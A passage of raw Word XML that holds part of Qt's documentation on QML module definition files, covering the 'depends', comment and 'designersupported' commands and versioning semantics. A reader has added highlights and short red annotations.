                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, QML tools may be unable to offer features such as code completion for the types defined in your plugins.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidTr="002C2AE0">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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">depends </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>ModuleIdentifier</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>InitialVersion</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3663" w:type="pct"/>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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Declares that this module </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>depends on</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> another.</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Example:</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depends MyOtherModule </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="0035707C" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>This declaration is necessary only in cases when the dependency is hidden: for example, when the C++ code for one module is used to load QML (perhaps conditionally) which then depends on other modules. In such cases, the</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>depends</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">declaration is necessary to </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>include the other modules in application packages</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0035707C" w:rsidRPr="0035707C">
              <w:rPr>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Intbu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2AE0" w:rsidRPr="002230B8" w:rsidTr="002C2AE0">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C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="com"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="55FFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t># &lt;Comment&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3663" w:type="pct"/>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C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Declares a </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>comment</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. These are ignored by the engine.</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t>Example:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="preprocessor"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># this is a comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidTr="002C2AE0">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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:spacing w:before="180" w:after="375"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>designersupported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3663" w:type="pct"/>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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Set this property if the plugin </w:t>
            </w:r>
            <w:r w:rsidRPr="00A82330">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is supported by Qt Quick Designer</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="00A82330">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>By default</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, the plugin </w:t>
            </w:r>
            <w:r w:rsidRPr="00A82330">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>will not</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> be supported.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">A plugin that is supported by Qt Quick Designer </w:t>
            </w:r>
            <w:r w:rsidRPr="00A82330">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>has to be properly tested</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. This means that the plugin does not crash when running inside the </w:t>
            </w:r>
            <w:r w:rsidRPr="00A82330">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>qml2puppet</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> that is used by Qt Quick Designer to execute QML. Generally the plugin </w:t>
            </w:r>
            <w:r w:rsidRPr="00A82330">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>should work well in the Qt Quick Designer</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and not cause any show stoppers, like taking huge amounts of memory, slowing down the qml2puppet heavily or anything else that renders the plugin effectively unusable in the Qt Quick Designer.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="00A82330" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The items of an unsupported plugin are not painted in the Qt Quick Designer, but they are still available as empty boxes and the properties can be edited.</w:t>
            </w:r>
            <w:r w:rsidR="00A82330">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A82330" w:rsidRPr="00A82330">
              <w:rPr>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Intbu how to do them available.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Each command</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a</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rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">file must be </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on a separate line</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00C472B3" w:rsidRDefault="002C2AE0" w:rsidP="00184E65">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="354" w:name="versioning-semantics"/>
      <w:bookmarkStart w:id="355" w:name="_Toc483000607"/>
      <w:bookmarkStart w:id="356" w:name="_Toc483003624"/>
      <w:bookmarkStart w:id="357" w:name="_Toc483603960"/>
      <w:bookmarkStart w:id="358" w:name="_Toc483605180"/>
      <w:bookmarkEnd w:id="354"/>
      <w:r w:rsidRPr="00184E65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Versioning Semantics</w:t>
      </w:r>
      <w:bookmarkEnd w:id="355"/>
      <w:bookmarkEnd w:id="356"/>
      <w:bookmarkEnd w:id="357"/>
      <w:bookmarkEnd w:id="358"/>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2C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Types which are exported for a particular version are </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">still made available if </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a later version is imported</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If a module provides a</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MyButton</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type in version 1.0 and a</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MyWindow</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type in version 1.1, clients which import version 1.1 of the module will be able to use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MyButton</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type and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MyWindow</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type. However, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the reverse is not true</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: a type exported for a particular version cannot be used if an earlier version is imported. If the client had imported version 1.0 of the module, they can use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MyButton</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type but</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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MyWindow</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</w:t>
      </w:r>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2C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">version cannot be </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imported if no types have been explicitly exported for that version</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If a module provides a</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MyButton</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
